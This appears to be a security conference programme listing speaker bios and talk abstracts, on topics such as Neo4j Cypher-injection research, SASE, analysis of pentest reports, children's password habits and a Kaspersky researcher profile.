Nitay Bachrach & Or Emanuel (Varonis)
SPEAKER BIO

Or Emanuel is the Director of Research and Security and Nitay Bachrach is a Security Researcher at Varonis.
ABSTRACT
Neo4j is the most popular graph database. In this presentation, we will present how an attacker that encounters a Neo4j database can abuse it not only to manipulate the app and steal data from the graph but also how to retrieve more
useful information from the server and move laterally to other services and cloud assets.
This talk will explore novel techniques for exploiting Neo4j. Starting from different Cypher-injections, how to overcome protections, and how to abuse them, all the way through to practical post-exploitation techniques.
Additionally, we show how attackers that gain a foothold and connect to an instance directly can extract secrets and pivot into the cloud (AWS, GCP, and Azure).
Security researchers will learn what they can do with Neo4j and how to exploit Neo4j servers. Defenders will learn what threat actors can do, so they will have the tools to protect their environment fully.

Optimising Business Value with Secure Access Service Edge

Neil Thacker (Netskope)
SPEAKER BIO

Neil Thacker is Chief Information Security Officer (EMEA) for Netskope and holds over 20 years’ experience in the information security industry with previous roles at Swiss Re, Deutsche Bank and Camelot Group. Neil is advisory board member to the Cloud Security Alliance (CSA), advisory board member to NeuroCyber, and co-founder and board member to the Security Advisor Alliance (SAA). Neil is CISSP, CIPP/E and CEH certified and is a frequent speaker and author of cybersecurity, data protection and privacy-related content. Neil holds multiple awards including being named recently in the CSO30 by IDG which recognises 30 outstanding leaders for demonstrating outstanding business value and thought leadership within their organisation.
ABSTRACT
With compounding pressures of high inflation, scarce & expensive talent and global supply challenges affecting many organisations today, this session will explain how organisations that have adopted Secure Access Service Edge or SASE, have seen improved gains through an overall decrease in risk posture, improved business agility and overall improved ROI/TCO

Pentesting by the numbers - what data analysis tells about what we do

Charl van der Walt
SPEAKER BIO

ABSTRACT
We've done a lot of penetration testing over the years. Each test has its own scope, objectives and constraints. Each test is performed by a specific hacker, who has unique methods, strengths and weaknesses. Every test is different.
But with enough tests, performed over enough time, there is a goldmine of data on patterns and trends we can use to develop a better understanding of what we’re doing, what we’re reporting, and how our customers are responding.
As reports are a boutique product – hand-written by the tester and customized to meet the customer’s specific requirement - they do not lend themselves readily to quantitative analysis. For the purpose of this study, therefore, we have developed a basic Machine Learning capability that is able to ‘read’ these human-readable reports, quantify specific elements (like Findings and their assigned Severity) and even extract key entities, like CVE numbers, technologies involved, etc.
We collected, anonymized and enriched over 1,400 Penetration Test reports dating back to January 2018.
The ‘Findings’ of a Penetration Test report are obviously only a small element of the overall output, but they contain elements similar datapoints to the Findings of a vulnerability scan and can be analysed in a similar way, and even compared to some extent.
In this presentation we tell the story of how we analyzed the data from thousands of penetration testing reports dating back more than four years. We describe the challenges we faced in data collection, the tools we developed to help us, the questions we asked once we had the data and the patterns that emerged once we had an analysis capability in hand.
We also share similar insights gleaned from a massive database of automated vulnerability scans and even from other perspectives, including security intelligence and incident detection and response.
None of these datasets is perfect, but they do hold valuable intelligence. Viewed together, they provide some invaluable insights. In this talk we will look at the data from penetration testing and other diverse services separately and, where sensible, together.
Join us in this session for a fascinating journey of exploration and discovery. Learn from our successes and our failures and help us think about the fresh questions and challenges that emerge when we try to extract useful intelligence from the work that we do.

Why kidz couldn’t care less about your password advice?

Mia Landsem
SPEAKER BIO

Mia Landsem (25) is an award winning Norwegian author, writer, speaker and ethical hacker. She started in Orange Cyber Defense Norway as a pentester August 2020 after finishing her IT Security education. Mia has a great skill in social engineering and has written a best-selling children’s book about how to be safe online and have had hundreds of lectures about image-based abuse.

Mia has won several prices for her work in helping thousands of victims of online image abuse, hacking and fraud, winning "The Girl Award" (Plan International) in 2018 and "Influencer of the year". She has also been a finalist in "Bravest woman of the year" and "Årets Trønder" /"Trønder of the year". She has also been a top 3 finalist (2021) in the international award “Cyber security woman of the year”. The jury of The Girl Award said the following; - The winner of the Girl Award 2018 is an institution in itself. Mia Landsem shows the way by being energetic and extremely brave. Superman and Batman are nowhere near, this year's winner is among the roughest in its time. This is a winner we all want to be like. This is a winner we had all run to for help, says jury leader Navjot Sandhu.

ABSTRACT
For kids & teens to use social media and play games, they often have to authenticate using a password. They face the same cyber security threats as the grownups, from a younger age. Their parents are often their first role models when it comes to knowing about these threats and to protect themselves. Parents and children report that they talk together about online safety. That is great news, but when did we ever listen to our parents? Did we use our dogs name as our password? Did we share our password and pin code with our best friend? Did we drink that damned tequila shot when we were told we would get sick? Yes we did.
Mia Landsem will talk about the issues that these young children face. Being hacked on their favorite game, their best friend who logged into their Instagram account and started to write nasty stuff to other children, the nude photos that were saved on their snapchat that suddenly ended up in a hackers hand and they receive a message that if they do not send more photos, they will post the nude photos on their story to all their friends. Mia will talk about HOW we should educate the young ones, and how to make them care about security, passwords and password managers. Why kidz couldn’t care less about your password advice? Come find out!

Kaspersky

Marco Preuss (Kaspersky)
SPEAKER BIO

In 2022, Marco was appointed Deputy Director for the company’s Global Research & Analysis Team. Marco got promoted from the position of Director of Europe for the Global Research & Analysis Team at Kaspersky, that he has led since March 2013. Prior to becoming Director of Europe, Marco served as the head of Kaspersky’s Global Research & Analysis Team in Germany and senior security researcher. Marco has been working in the area of networking and IT security since the early 2000s. Having long term experience in his role, he is responsible for monitoring the threat landscape in Europe while specializing in threat intelligence, darknet research, password security, IoT security and privacy. In addition to research-related projects, Marco is a regular speaker at both closed and public events and maintains close contact with security partners.

Marco began his career with Kaspersky back in 2004 as a Technical Consultant, providing expert knowledge on Linux and Unix-based systems. He has also been involved in corporate sales management, before moving on to become the technical contact for the OEM department, supporting customized solutions. Marco worked extensively with the company’s product design and development teams and joined the research team as a Virus Analyst in 2009.

ABSTRACT